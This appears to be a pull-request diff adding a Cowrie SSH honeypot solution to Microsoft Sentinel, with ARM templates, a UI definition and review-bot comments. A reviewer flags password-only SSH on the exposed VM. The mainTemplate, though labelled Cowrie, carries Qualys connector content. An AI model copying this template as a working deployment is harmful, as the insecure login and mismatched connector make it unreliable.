"recordStartTimestampFormat": "ISO 8601" + } + }, + "streams": [ + "Custom-Text-cowrie_CL" + ] + } + ] + }, + "destinations": { + "logAnalytics": [ + { + "name": "MyDestination", + "workspaceResourceId": "[variables('workspaceId')]" + } + ] + }, + "streamDeclarations": { + "Custom-Text-cowrie_CL": { + "columns": [ + { + "name": "TimeGenerated", + "type": "datetime" + }, + { + "name": "Message", + "type": "string" + }, + { + "name": "RawData", + "type": "string" + } + ] + } + } + } + }, + { + "type": "Microsoft.Insights/dataCollectionRuleAssociations", + "dependsOn": [ + "[resourceId('Microsoft.Insights/dataCollectionRules', variables('dcrName'))]", + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "apiVersion": "2023-03-11", + "scope": "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]", + "name": "cowrie-dcr-assoc", + "location": "[resourceGroup().location]", + "properties": { + "dataCollectionRuleId": "[resourceId('Microsoft.Insights/dataCollectionRules', variables('dcrName'))]" + } + } + ], + "outputs": { + "adminUsername": { + "type": "String", + "value": "[parameters('adminUsername')]" + } + } +} \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Package/createUiDefinition.json b/Solutions/Sensor SSH Cowrie/Package/createUiDefinition.json new file mode 100644 index 00000000000..543134147a7 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Package/createUiDefinition.json 
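Review bot: The VM gets a public IP and `osProfile` configures the real administrative account with `adminPassword` only, never setting `linuxConfiguration.disablePasswordAuthentication`, so the management SSH listener on 22222 (presumably where script.sh moves the real sshd, not shown in this diff) is password-protected on an internet-facing host whose whole purpose is to attract login attempts; key-based login should be the only option there. That needs an `adminSshPublicKey` parameter next to `adminUsername` in the `parameters` block of this hunk and the `osProfile` change below, with `adminPassword` dropped or made optional. The NSG `AzureCloud` rule and the `scriptUrl` issues are covered in the note on azuredeployprivate.json. Separately, `vnetName` `VNET-Sensor` and the `10.0.0.0/16` address space are hard-coded in `variables`, so a second sensor in the same resource group silently reuses the first one's network; consider parameterizing them the way `vmName` is.
```json
"osProfile": {
  "computerName": "[parameters('vmName')]",
  "adminUsername": "[parameters('adminUsername')]",
  "linuxConfiguration": {
    "disablePasswordAuthentication": true,
    "ssh": {
      "publicKeys": [
        {
          "path": "[concat('/home/', parameters('adminUsername'), '/.ssh/authorized_keys')]",
          "keyData": "[parameters('adminSshPublicKey')]"
        }
      ]
    }
  }
}
```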
@@ -0,0 +1,224 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/0.1.2-preview/CreateUIDefinition.MultiVm.json#",
+ "handler": "Microsoft.Azure.CreateUIDef",
+ "version": "0.1.2-preview",
+ "parameters": {
+ "config": {
+ "isWizard": false,
+ "basics": {
+ "description": "**Note:** Please refer to the following before installing the solution: \n\n• Review the solution [Release Notes](https://github.com/Azure/Azure-Sentinel/tree/master/Solutions/Sensor%20SSH%20Cowrie/ReleaseNotes.md)\n\n • There may be [known issues](https://aka.ms/sentinelsolutionsknownissues) pertaining to this Solution, please refer to them before installing.\n\nThe Sensor SSH Cowrie solution for Microsoft Sentinel enables you to deploy a Azure VM for as a HoneyPot for private internal detection tripwire capabilitties or deploy publicly on the internet for threat intellegence gathering.\r\n\r\n **Underlying Technologies used:** \r\n\r\n This solution takes a dependency on technologies, and some of these dependencies may result in additional ingestion or operational costs.\r\n\na. [Cowrie](https://cowrie.readthedocs.io/en/latest/)\r\n\n\n\n**Data Connectors:** 1, **Workbooks:** 1, **Analytic Rules:** 5\n\n[Learn more about Microsoft Sentinel](https://aka.ms/azuresentinel) | [Learn more about Solutions](https://aka.ms/azuresentinelsolutionsdoc)",
+ "subscription": {
+ "resourceProviders": [
+ "Microsoft.OperationsManagement/solutions",
+ "Microsoft.OperationalInsights/workspaces/providers/alertRules",
+ "Microsoft.Insights/workbooks"
+ ]
+ },
+ "location": {
+ "metadata": {
+ "hidden": "Hiding location, we get it from the log analytics workspace"
+ },
+ "visible": false
+ },
+ "resourceGroup": {
+ "allowExisting": true
+ }
+ }
+ },
+ "basics": [
+ {
+ "name": "getLAWorkspace",
+ "type": "Microsoft.Solutions.ArmApiControl",
+ "toolTip": "This filters by workspaces that exist in the Resource Group selected",
+ "condition": "[greater(length(resourceGroup().name),0)]",
+ "request": {
+ "method": "GET",
+ "path": "[concat(subscription().id,'/providers/Microsoft.OperationalInsights/workspaces?api-version=2020-08-01')]"
+ }
+ },
+ {
+ "name": "workspace",
+ "type": "Microsoft.Common.DropDown",
+ "label": "Workspace",
+ "placeholder": "Select a workspace",
+ "toolTip": "This dropdown will list only workspace that exists in the Resource Group selected",
+ "constraints": {
+ "allowedValues": "[map(filter(basics('getLAWorkspace').value, (filter) => contains(toLower(filter.id), toLower(resourceGroup().name))), (item) => parse(concat('{\"label\":\"', item.name, '\",\"value\":\"', item.name, '\"}')))]",
+ "required": true
+ },
+ "visible": true
+ }
+ ],
+ "steps": [
+ {
+ "name": "dataconnectors",
+ "label": "Data Connectors",
+ "bladeTitle": "Data Connectors",
+ "elements": [
+ {
+ "name": "dataconnectors1-text",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "text": "This Solution installs the data connector for Sensor SSH Cowrie. You can get Cowrie Events custom log data in your Microsoft Sentinel workspace. After installing the solution, configure and enable this data connector by following guidance in Manage solution view."
+ }
+ },
+ {
+ "name": "dataconnectors-link2",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "link": {
+ "label": "Learn more about connecting data sources",
+ "uri": "https://docs.microsoft.com/azure/sentinel/connect-data-sources"
+ }
+ }
+ }
+ ]
+ },
+ {
+ "name": "workbooks",
+ "label": "Workbooks",
+ "subLabel": {
+ "preValidation": "Configure the workbooks",
+ "postValidation": "Done"
+ },
+ "bladeTitle": "Workbooks",
+ "elements": [
+ {
+ "name": "workbooks-text",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "text": "This solution installs workbook(s) to help you gain insights into the Cowrie events collected in Microsoft Sentinel. After installing the solution, start using the workbook in Manage solution view."
+ }
+ },
+ {
+ "name": "workbooks-link",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "link": {
+ "label": "Learn more",
+ "uri": "https://docs.microsoft.com/azure/sentinel/tutorial-monitor-your-data"
+ }
+ }
+ },
+ {
+ "name": "workbook1",
+ "type": "Microsoft.Common.Section",
+ "label": "Cowrie",
+ "elements": [
+ {
+ "name": "workbook1-text",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "text": "Gain insight into Cowrie events by analyzing, collecting and correlating Cowrie event data.\nThis workbook provides visibility into cowrie events on the sensor"
+ }
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "name": "analytics",
+ "label": "Analytics",
+ "subLabel": {
+ "preValidation": "Configure the analytics",
+ "postValidation": "Done"
+ },
+ "bladeTitle": "Analytics",
+ "elements": [
+ {
+ "name": "analytics-text",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "text": "This solution installs the following analytic rule templates. After installing the solution, create and enable analytic rules in Manage solution view."
+ }
+ },
+ {
+ "name": "analytics-link",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "link": {
+ "label": "Learn more",
+ "uri": "https://docs.microsoft.com/azure/sentinel/tutorial-detect-threats-custom?WT.mc_id=Portal-Microsoft_Azure_CreateUIDef"
+ }
+ }
+ },
+ {
+ "name": "analytic1",
+ "type": "Microsoft.Common.Section",
+ "label": "Detect Suspicious File Downloads",
+ "elements": [
+ {
+ "name": "analytic1-text",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "text": "This Creates an incident when identifying instances where files were downloaded from suspicious or known malicious URLs."
+ }
+ }
+ ]
+ },
+ {
+ "name": "analytic2",
+ "type": "Microsoft.Common.Section",
+ "label": "Monitor Unusual File Execution",
+ "elements": [
+ {
+ "name": "analytic2-text",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "text": "This Creates an incident when identifying attempts to execute files or scripts that are unusual or not typical for the environment."
+ }
+ }
+ ]
+ },
+ {
+ "name": "analytic3",
+ "type": "Microsoft.Common.Section",
+ "label": "Detect File Uploads and Downloads",
+ "elements": [
+ {
+ "name": "analytic3-text",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "text": "This Creates an incident when identifying file uploads and downloads to detect potential exfiltration or data theft activities."
+ }
+ }
+ ]
+ },
+ {
+ "name": "analytic4",
+ "type": "Microsoft.Common.Section",
+ "label": "Detect Connection Events",
+ "elements": [
+ {
+ "name": "analytic4-text",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "text": "This Creates an incident when identifying connection events to detect unusual patterns in access or possible reconnaissance activity."
+ }
+ }
+ ]
+ },
+ {
+ "name": "analytic5",
+ "type": "Microsoft.Common.Section",
+ "label": "Alert on High Number of Failed Login Attempts",
+ "elements": [
+ {
+ "name": "analytic5-text",
+ "type": "Microsoft.Common.TextBlock",
+ "options": {
+ "text": "This Creates an incident when identifying brute-force or password-guessing attacks by monitoring a high volume of failed login attempts."
+ }
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "outputs": {
+ "workspace-location": "[first(map(filter(basics('getLAWorkspace').value, (filter) => and(contains(toLower(filter.id), toLower(resourceGroup().name)),equals(filter.name,basics('workspace')))), (item) => item.location))]",
+ "location": "[location()]",
+ "workspace": "[basics('workspace')]"
+ }
+ }
+}
diff --git a/Solutions/Sensor SSH Cowrie/Package/mainTemplate.tbd b/Solutions/Sensor SSH Cowrie/Package/mainTemplate.tbd
new file mode 100644
index 00000000000..a9bf3767874
--- /dev/null
+++ b/Solutions/Sensor SSH Cowrie/Package/mainTemplate.tbd
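Review bot: The `basics.description` string is shown verbatim to every installer and carries several typos and grammar slips: `deploy a Azure VM for as a HoneyPot for private internal detection tripwire capabilitties or deploy publicly on the internet for threat intellegence gathering`; suggest `deploy an Azure VM as a honeypot for private internal tripwire detection, or deploy it publicly on the internet for threat-intelligence gathering`. The same string mixes `\r\n` and `\n` line breaks, which renders unevenly in the marketplace blade; use `\n` throughout as the rest of this file does. The five `analyticN-text` blocks all start with `This Creates an incident when identifying ...`; lower-case `creates` (or drop `This`) so the sentences read naturally in the portal.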
@@ -0,0 +1,7765 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "author": "Microsoft - support@microsoft.com", + "comments": "Solution template for Cowrie" + }, + "parameters": { + "location": { + "type": "string", + "minLength": 1, + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Not used, but needed to pass arm-ttk test `Location-Should-Not-Be-Hardcoded`. We instead use the `workspace-location` which is derived from the LA workspace" + } + }, + "workspace-location": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "[concat('Region to deploy solution resources -- separate from location selection',parameters('location'))]" + } + }, + "workspace": { + "defaultValue": "", + "type": "string", + "metadata": { + "description": "Workspace name for Log Analytics where Microsoft Sentinel is setup" + } + }, + "workbook1-name": { + "type": "string", + "defaultValue": "Cowrie", + "minLength": 1, + "metadata": { + "description": "Name for the workbook" + } + } + }, + "variables": { + "email": "support@microsoft.com", + "_email": "[variables('email')]", + "_solutionName": "Sensor SSH Cowrie", + "_solutionVersion": "3.0.0", + "solutionId": "azuresentinel.azure-sentinel-sensor-ssh-cowrie", + "_solutionId": "[variables('solutionId')]", + "uiConfigId1": "Cowrie", + "_uiConfigId1": "[variables('uiConfigId1')]", + "dataConnectorContentId1": "Cowrie", + "_dataConnectorContentId1": "[variables('dataConnectorContentId1')]", + "dataConnectorId1": "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/dataConnectors', variables('_dataConnectorContentId1'))]", + "_dataConnectorId1": "[variables('dataConnectorId1')]", + "dataConnectorTemplateSpecName1": 
"[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-dc-',uniquestring(variables('_dataConnectorContentId1'))))]", + "dataConnectorVersion1": "2.0.0", + "_dataConnectorcontentProductId1": "[concat(take(variables('_solutionId'),50),'-','dc','-', uniqueString(concat(variables('_solutionId'),'-','DataConnector','-',variables('_dataConnectorContentId1'),'-', variables('dataConnectorVersion1'))))]", + "workbookVersion1": "1.0.0", + "workbookContentId1": "CowrieWorkbook", + "workbookId1": "[resourceId('Microsoft.Insights/workbooks', variables('workbookContentId1'))]", + "workbookTemplateSpecName1": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-wb-',uniquestring(variables('_workbookContentId1'))))]", + "_workbookContentId1": "[variables('workbookContentId1')]", + "workspaceResourceId": "[resourceId('microsoft.OperationalInsights/Workspaces', parameters('workspace'))]", + "_workbookcontentProductId1": "[concat(take(variables('_solutionId'),50),'-','wb','-', uniqueString(concat(variables('_solutionId'),'-','Workbook','-',variables('_workbookContentId1'),'-', variables('workbookVersion1'))))]", + "analyticRuleObject1": { + "analyticRuleVersion1": "1.0.1", + "_analyticRulecontentId1": "ccbfc8aa-d1fe-4f62-b192-67f6c4edc9a2", + "analyticRuleId1": "[resourceId('Microsoft.SecurityInsights/AlertRuleTemplates', 'ccbfc8aa-d1fe-4f62-b192-67f6c4edc9a2')]", + "analyticRuleTemplateSpecName1": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-ar-',uniquestring('ccbfc8aa-d1fe-4f62-b192-67f6c4edc9a2')))]", + "_analyticRulecontentProductId1": "[concat(take(variables('_solutionId'),50),'-','ar','-', uniqueString(concat(variables('_solutionId'),'-','AnalyticsRule','-','ccbfc8aa-d1fe-4f62-b192-67f6c4edc9a2','-', '1.0.1')))]" + }, + "analyticRuleObject2": { + "analyticRuleVersion2": "1.0.1", + "_analyticRulecontentId2": 
"4a566fa4-f901-44fd-9890-a476d163e86a", + "analyticRuleId2": "[resourceId('Microsoft.SecurityInsights/AlertRuleTemplates', '4a566fa4-f901-44fd-9890-a476d163e86a')]", + "analyticRuleTemplateSpecName2": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-ar-',uniquestring('4a566fa4-f901-44fd-9890-a476d163e86a')))]", + "_analyticRulecontentProductId2": "[concat(take(variables('_solutionId'),50),'-','ar','-', uniqueString(concat(variables('_solutionId'),'-','AnalyticsRule','-','4a566fa4-f901-44fd-9890-a476d163e86a','-', '1.0.1')))]" + }, + "analyticRuleObject3": { + "analyticRuleVersion3": "1.0.1", + "_analyticRulecontentId3": "53016cac-ca6c-4b2b-a4c4-7325afcb9502", + "analyticRuleId3": "[resourceId('Microsoft.SecurityInsights/AlertRuleTemplates', '53016cac-ca6c-4b2b-a4c4-7325afcb9502')]", + "analyticRuleTemplateSpecName3": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-ar-',uniquestring('53016cac-ca6c-4b2b-a4c4-7325afcb9502')))]", + "_analyticRulecontentProductId3": "[concat(take(variables('_solutionId'),50),'-','ar','-', uniqueString(concat(variables('_solutionId'),'-','AnalyticsRule','-','53016cac-ca6c-4b2b-a4c4-7325afcb9502','-', '1.0.1')))]" + }, + "analyticRuleObject4": { + "analyticRuleVersion4": "1.0.1", + "_analyticRulecontentId4": "f72805a7-b8c5-45fb-aacf-d0db7e0bf49b", + "analyticRuleId4": "[resourceId('Microsoft.SecurityInsights/AlertRuleTemplates', 'f72805a7-b8c5-45fb-aacf-d0db7e0bf49b')]", + "analyticRuleTemplateSpecName4": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-ar-',uniquestring('f72805a7-b8c5-45fb-aacf-d0db7e0bf49b')))]", + "_analyticRulecontentProductId4": "[concat(take(variables('_solutionId'),50),'-','ar','-', uniqueString(concat(variables('_solutionId'),'-','AnalyticsRule','-','f72805a7-b8c5-45fb-aacf-d0db7e0bf49b','-', '1.0.1')))]" + }, + "analyticRuleObject5": { + "analyticRuleVersion5": "1.0.1", 
+ "_analyticRulecontentId5": "b86b27e3-adb9-4f39-8c4e-0b7300031984", + "analyticRuleId5": "[resourceId('Microsoft.SecurityInsights/AlertRuleTemplates', 'b86b27e3-adb9-4f39-8c4e-0b7300031984')]", + "analyticRuleTemplateSpecName5": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat(parameters('workspace'),'-ar-',uniquestring('b86b27e3-adb9-4f39-8c4e-0b7300031984')))]", + "_analyticRulecontentProductId5": "[concat(take(variables('_solutionId'),50),'-','ar','-', uniqueString(concat(variables('_solutionId'),'-','AnalyticsRule','-','b86b27e3-adb9-4f39-8c4e-0b7300031984','-', '1.0.1')))]" + }, + "CowrieCustomConnector": "CowrieCustomConnector", + "_CowrieCustomConnector": "[variables('CowrieCustomConnector')]", + "TemplateEmptyArray": "[json('[]')]", + "_solutioncontentProductId": "[concat(take(variables('_solutionId'),50),'-','sl','-', uniqueString(concat(variables('_solutionId'),'-','Solution','-',variables('_solutionId'),'-', variables('_solutionVersion'))))]" + }, + "resources": [ + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('dataConnectorTemplateSpecName1')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysVM data connector with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('dataConnectorVersion1')]", + "parameters": {}, + "variables": {}, + "resources": [ + { + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',variables('_dataConnectorContentId1'))]", + "apiVersion": "2021-03-01-preview", + "type": 
"Microsoft.OperationalInsights/workspaces/providers/dataConnectors", + "location": "[parameters('workspace-location')]", + "kind": "GenericUI", + "properties": { + "connectorUiConfig": { + "id": "[variables('_uiConfigId1')]", + "title": "Qualys Vulnerability Management (using Azure Functions)", + "publisher": "Qualys", + "descriptionMarkdown": "The [Qualys Vulnerability Management (VM)](https://www.qualys.com/apps/vulnerability-management/) data connector provides the capability to ingest vulnerability host detection data into Microsoft Sentinel through the Qualys API. The connector provides visibility into host detection data from vulerability scans. This connector provides Microsoft Sentinel the capability to view dashboards, create custom alerts, and improve investigation ", + "graphQueries": [ + { + "metricName": "Total data received", + "legend": "QualysHostDetectionV2_CL", + "baseQuery": "QualysHostDetectionV2_CL" + }, + { + "metricName": "Total data received", + "legend": "QualysHostDetection_CL", + "baseQuery": "QualysHostDetection_CL" + } + ], + "sampleQueries": [ + { + "description": "Top 10 Qualys V2 Vulerabilities detected", + "query": "QualysHostDetectionV2_CL\n | extend Vulnerability = tostring(QID_s)\n | summarize count() by Vulnerability\n | top 10 by count_" + }, + { + "description": "Top 10 Vulerabilities detected", + "query": "QualysHostDetection_CL\n | mv-expand todynamic(Detections_s)\n | extend Vulnerability = tostring(Detections_s.Results)\n | summarize count() by Vulnerability\n | top 10 by count_" + } + ], + "dataTypes": [ + { + "name": "QualysHostDetectionV2_CL", + "lastDataReceivedQuery": "QualysHostDetectionV2_CL\n | summarize Time = max(TimeGenerated)\n | where isnotempty(Time)" + }, + { + "name": "QualysHostDetection_CL", + "lastDataReceivedQuery": "QualysHostDetection_CL\n | summarize Time = max(TimeGenerated)\n | where isnotempty(Time)" + } + ], + "connectivityCriterias": [ + { + "type": "IsConnectedQuery", + "value": [ + 
"QualysHostDetectionV2_CL\n | summarize LastLogReceived = max(TimeGenerated)\n | project IsConnected = LastLogReceived > ago(30d)", + "QualysHostDetection_CL\n | summarize LastLogReceived = max(TimeGenerated)\n | project IsConnected = LastLogReceived > ago(30d)" + ] + } + ], + "availability": { + "status": 1, + "isPreview": false + }, + "permissions": { + "resourceProvider": [ + { + "provider": "Microsoft.OperationalInsights/workspaces", + "permissionsDisplayText": "read and write permissions on the workspace are required.", + "providerDisplayName": "Workspace", + "scope": "Workspace", + "requiredPermissions": { + "write": true, + "read": true, + "delete": true + } + }, + { + "provider": "Microsoft.OperationalInsights/workspaces/sharedKeys", + "permissionsDisplayText": "read permissions to shared keys for the workspace are required. [See the documentation to learn more about workspace keys](https://docs.microsoft.com/azure/azure-monitor/platform/agent-windows#obtain-workspace-id-and-key).", + "providerDisplayName": "Keys", + "scope": "Workspace", + "requiredPermissions": { + "action": true + } + } + ], + "customs": [ + { + "name": "Microsoft.Web/sites permissions", + "description": "Read and write permissions to Azure Functions to create a Function App is required. [See the documentation to learn more about Azure Functions](https://docs.microsoft.com/azure/azure-functions/)." + }, + { + "name": "Qualys API Key", + "description": "A Qualys VM API username and password is required. [See the documentation to learn more about Qualys VM API](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf)." + } + ] + }, + "instructionSteps": [ + { + "description": ">**NOTE:** This connector uses Azure Functions to connect to Qualys VM to pull its logs into Microsoft Sentinel. This might result in additional data ingestion costs. Check the [Azure Functions pricing page](https://azure.microsoft.com/pricing/details/functions/) for details." 
+ }, + { + "description": ">**(Optional Step)** Securely store workspace and API authorization key(s) or token(s) in Azure Key Vault. Azure Key Vault provides a secure mechanism to store and retrieve key values. [Follow these instructions](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) to use Azure Key Vault with an Azure Function App." + }, + { + "description": "**STEP 1 - Configuration steps for the Qualys VM API**\n\n1. Log into the Qualys Vulnerability Management console with an administrator account, select the **Users** tab and the **Users** subtab. \n2. Click on the **New** drop-down menu and select **Users..**\n3. Create a username and password for the API account. \n4. In the **User Roles** tab, ensure the account role is set to **Manager** and access is allowed to **GUI** and **API**\n4. Log out of the administrator account and log into the console with the new API credentials for validation, then log out of the API account. \n5. Log back into the console using an administrator account and modify the API accounts User Roles, removing access to **GUI**. \n6. Save all changes." + }, + { + "description": "**STEP 2 - Choose ONE from the following two deployment options to deploy the connector and the associated Azure Function**\n\n>**IMPORTANT:** Before deploying the Qualys VM connector, have the Workspace ID and Workspace Primary Key (can be copied from the following), as well as the Qualys VM API Authorization Key(s), readily available.", + "instructions": [ + { + "parameters": { + "fillWith": [ + "WorkspaceId" + ], + "label": "Workspace ID" + }, + "type": "CopyableLabel" + }, + { + "parameters": { + "fillWith": [ + "PrimaryKey" + ], + "label": "Primary Key" + }, + "type": "CopyableLabel" + } + ] + }, + { + "description": ">**NOTE:** This connector has been updated, if you have previously deployed an earlier version, and want to update, please delete the existing Qualys VM Azure Function before redeploying this version. 
Please use Qualys V2 version Workbook, detections. " + }, + { + "description": "Use this method for automated deployment of the Qualys VM connector using an ARM Tempate.\n\n1. Click the **Deploy to Azure** button below. \n\n\t[![Deploy To Azure](https://aka.ms/deploytoazurebutton)](https://aka.ms/sentinel-QualysVM-azuredeployV2) [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://aka.ms/sentinel-QualysVM-azuredeployV2-gov)\n2. Select the preferred **Subscription**, **Resource Group** and **Location**. \n3. Enter the **Workspace ID**, **Workspace Key**, **API Username**, **API Password** , update the **URI**, and any additional URI **Filter Parameters** (each filter should be separated by an \"&\" symbol, no spaces.) \n> - Enter the URI that corresponds to your region. The complete list of API Server URLs can be [found here](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf#G4.735348) -- There is no need to add a time suffix to the URI, the Function App will dynamically append the Time Value to the URI in the proper format. \n - The default **Time Interval** is set to pull the last five (5) minutes of data. If the time interval needs to be modified, it is recommended to change the Function App Timer Trigger accordingly (in the function.json file, post deployment) to prevent overlapping data ingestion. \n> - Note: If using Azure Key Vault secrets for any of the values above, use the`@Microsoft.KeyVault(SecretUri={Security Identifier})`schema in place of the string values. Refer to [Key Vault references documentation](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) for further details. \n4. Mark the checkbox labeled **I agree to the terms and conditions stated above**. \n5. 
Click **Purchase** to deploy.", + "title": "Option 1 - Azure Resource Manager (ARM) Template" + }, + { + "description": "Use the following step-by-step instructions to deploy the Quayls VM connector manually with Azure Functions.", + "title": "Option 2 - Manual Deployment of Azure Functions" + }, + { + "description": "**1. Create a Function App**\n\n1. From the Azure Portal, navigate to [Function App](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites/kind/functionapp), and select **+ Add**.\n2. In the **Basics** tab, ensure Runtime stack is set to **Powershell Core**. \n3. In the **Hosting** tab, ensure the **Consumption (Serverless)** plan type is selected.\n4. Make other preferrable configuration changes, if needed, then click **Create**." + }, + { + "description": "**2. Import Function App Code**\n\n1. In the newly created Function App, select **Functions** on the left pane and click **+ New Function**.\n2. Select **Timer Trigger**.\n3. Enter a unique Function **Name** and leave the default cron schedule of every 5 minutes, then click **Create**.\n5. Click on **Code + Test** on the left pane. \n6. Copy the [Function App Code](https://aka.ms/sentinel-QualysVM-functioncodeV2) and paste into the Function App `run.ps1` editor.\n7. Click **Save**." + }, + { + "description": "**3. Configure the Function App**\n\n1. In the Function App, select the Function App Name and select **Configuration**.\n2. In the **Application settings** tab, select **+ New application setting**.\n3. Add each of the following eight (8) application settings individually, with their respective string values (case-sensitive): \n\t\tapiUsername\n\t\tapiPassword\n\t\tworkspaceID\n\t\tworkspaceKey\n\t\turi\n\t\tfilterParameters\n\t\ttimeInterval\n\t\tlogAnalyticsUri (optional)\n> - Enter the URI that corresponds to your region. The complete list of API Server URLs can be [found here](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf#G4.735348). 
The `uri` value must follow the following schema: `https:///api/2.0/fo/asset/host/vm/detection/?action=list&vm_processed_after=` -- There is no need to add a time suffix to the URI, the Function App will dynamically append the Time Value to the URI in the proper format.\n> - Add any additional filter parameters, for the `filterParameters` variable, that need to be appended to the URI. Each parameter should be seperated by an \"&\" symbol and should not include any spaces.\n> - Set the `timeInterval` (in minutes) to the value of `5` to correspond to the Timer Trigger of every `5` minutes. If the time interval needs to be modified, it is recommended to change the Function App Timer Trigger accordingly to prevent overlapping data ingestion.\n> - Note: If using Azure Key Vault, use the`@Microsoft.KeyVault(SecretUri={Security Identifier})`schema in place of the string values. Refer to [Key Vault references documentation](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) for further details.\n> - Use logAnalyticsUri to override the log analytics API endpoint for dedicated cloud. For example, for public cloud, leave the value empty; for Azure GovUS cloud environment, specify the value in the following format: `https://.ods.opinsights.azure.us`.\n4. Once all application settings have been entered, click **Save**." + }, + { + "description": "**4. Configure the host.json**.\n\nDue to the potentially large amount of Qualys host detection data being ingested, it can cause the execution time to surpass the default Function App timeout of five (5) minutes. Increase the default timeout duration to the maximum of ten (10) minutes, under the Consumption Plan, to allow more time for the Function App to execute.\n\n1. In the Function App, select the Function App Name and select the **App Service Editor** blade.\n2. Click **Go** to open the editor, then select the **host.json** file under the **wwwroot** directory.\n3. 
Add the line `\"functionTimeout\": \"00:10:00\",` above the `managedDependancy` line \n4. Ensure **SAVED** appears on the top right corner of the editor, then exit the editor.\n\n> NOTE: If a longer timeout duration is required, consider upgrading to an [App Service Plan](https://docs.microsoft.com/azure/azure-functions/functions-scale#timeout)" + } + ], + "metadata": { + "id": "9118ddc8-ca2c-48d3-8b10-9b198bd1ab3e", + "version": "2.0.0", + "kind": "dataConnector", + "source": { + "kind": "community" + }, + "author": { + "name": "Qualys VM" + }, + "support": { + "tier": "developer", + "name": "Qualys VM", + "email": "support@qualys.com", + "link": "https://www.qualys.com/support" + } + } + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2023-04-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('DataConnector-', last(split(variables('_dataConnectorId1'),'/'))))]", + "properties": { + "parentId": "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/dataConnectors', variables('_dataConnectorContentId1'))]", + "contentId": "[variables('_dataConnectorContentId1')]", + "kind": "DataConnector", + "version": "[variables('dataConnectorVersion1')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } + } + ] + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_dataConnectorContentId1')]", + "contentKind": "DataConnector", + 
"displayName": "Qualys Vulnerability Management (using Azure Functions)", + "contentProductId": "[variables('_dataConnectorcontentProductId1')]", + "id": "[variables('_dataConnectorcontentProductId1')]", + "version": "[variables('dataConnectorVersion1')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2023-04-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('DataConnector-', last(split(variables('_dataConnectorId1'),'/'))))]", + "dependsOn": [ + "[variables('_dataConnectorId1')]" + ], + "location": "[parameters('workspace-location')]", + "properties": { + "parentId": "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/dataConnectors', variables('_dataConnectorContentId1'))]", + "contentId": "[variables('_dataConnectorContentId1')]", + "kind": "DataConnector", + "version": "[variables('dataConnectorVersion1')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } + }, + { + 